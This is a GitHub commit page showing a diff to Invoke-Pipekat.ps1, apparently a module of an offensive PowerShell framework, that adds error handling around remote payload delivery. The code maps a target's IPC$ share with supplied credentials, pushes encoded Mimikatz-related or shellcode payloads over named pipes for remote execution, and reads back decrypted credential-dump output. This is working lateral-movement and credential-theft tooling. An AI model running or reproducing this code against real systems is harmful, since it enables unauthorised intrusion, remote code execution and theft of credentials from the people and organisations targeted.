Skip to content

Commit

Permalink
Added better error handling
Browse files Browse the repository at this point in the history
  • Loading branch information
benpturner committed May 30, 2017
1 parent dd8c694 commit 068437b
Showing 1 changed file with 36 additions and 10 deletions.
46 changes: 36 additions & 10 deletions Modules/Invoke-Pipekat.ps1
Original file line number Diff line number Diff line change
Expand Up @@ -203,13 +203,17 @@ IEX $wmicmd
}

echo "`n[+] Waiting for output from named pipe.......`n"
try {
add-Type -assembly "System.Core";
$pi = new-object System.IO.Pipes.NamedPipeClientStream("$pipeNameMimi");
$pi.Connect($TimeoutMS); $pr = new-object System.IO.StreamReader($pi);
$wp = $pr.ReadLine();
$pi.Dispose(); $pr.Dispose();
$pl = Decrypt-String -key $pipekey -encryptedStringWithIV $wp
$pl
} catch {
echo "Failed conecting to named pipe: $pipeNameMimi"
}

} else {
if($Hash) {echo "Cannot use a hash when executing shellcode remotely as it rquired the password to create a pipe session...."; return}
Expand Down Expand Up @@ -322,23 +326,38 @@ $mkun = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64Strin
$mkun += $postmimi
$Bytes = [System.Text.Encoding]::UTF8.GetBytes($mkun)
$ed = [Convert]::ToBase64String($Bytes)
add-Type -assembly "System.Core"

if ($domain -eq ".") {
$net = new-object -ComObject WScript.Network
$net.MapNetworkDrive("", "\\$target\ipc$", $false, "$username", "$Password")
} else {
$net = new-object -ComObject WScript.Network
$net.MapNetworkDrive("", "\\$target\ipc$", $false, "$domain\$username", "$Password")
}
try {
add-Type -assembly "System.Core"
$p = new-object System.IO.Pipes.NamedPipeClientStream($target, $pipeName);
$w = new-object System.IO.StreamWriter($p)
$p.Connect($TimeoutMS); $w.WriteLine($ed);
$w.Dispose(); $p.Dispose();
add-Type -assembly "System.Core";$p = new-object System.IO.Pipes.NamedPipeClientStream($target, $pipeNameMimi);
$p.Connect($TimeoutMS);$r = new-object System.IO.StreamReader($p);
$rr=$r.ReadLine();$p.Dispose();$r.Dispose();
$p.Connect($TimeoutMS);
$w.WriteLine($ed);
$w.Dispose();
$p.Dispose();
} catch {
echo "Failed conecting to named pipe: $target : $pipeName"
}
try {
add-Type -assembly "System.Core";
$p = new-object System.IO.Pipes.NamedPipeClientStream($target, $pipeNameMimi);
$p.Connect($TimeoutMS);
$r = new-object System.IO.StreamReader($p);
$rr=$r.ReadLine();
$p.Dispose();
$r.Dispose();
$pl = Decrypt-String -key $pipekey -encryptedStringWithIV $rr
$pl
} catch {
echo "Failed conecting to named pipe: $target : $pipeNameMimi"
}

}
} else {
Expand Down Expand Up @@ -423,19 +442,26 @@ $mkun = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64Strin
$mkun += $sc32
$Bytes = [System.Text.Encoding]::UTF8.GetBytes($mkun)
$ed = [Convert]::ToBase64String($Bytes)
add-Type -assembly "System.Core"

if ($domain -eq ".") {
$net = new-object -ComObject WScript.Network
$net.MapNetworkDrive("", "\\$target\ipc$", $false, "$username", "$Password")
} else {
$net = new-object -ComObject WScript.Network
$net.MapNetworkDrive("", "\\$target\ipc$", $false, "$domain\$username", "$Password")
}

try {
add-Type -assembly "System.Core"
$p = new-object System.IO.Pipes.NamedPipeClientStream($target, $pipeName);
$w = new-object System.IO.StreamWriter($p)
$p.Connect($TimeoutMS); $w.WriteLine($ed);
$w.Dispose(); $p.Dispose();

$p.Connect($TimeoutMS);
$w.WriteLine($ed);
$w.Dispose();
$p.Dispose();
} catch {
echo "Failed conecting to named pipe: $target : $pipeName"
}
}

}
Expand Down

0 comments on commit 068437b

Please sign in to comment.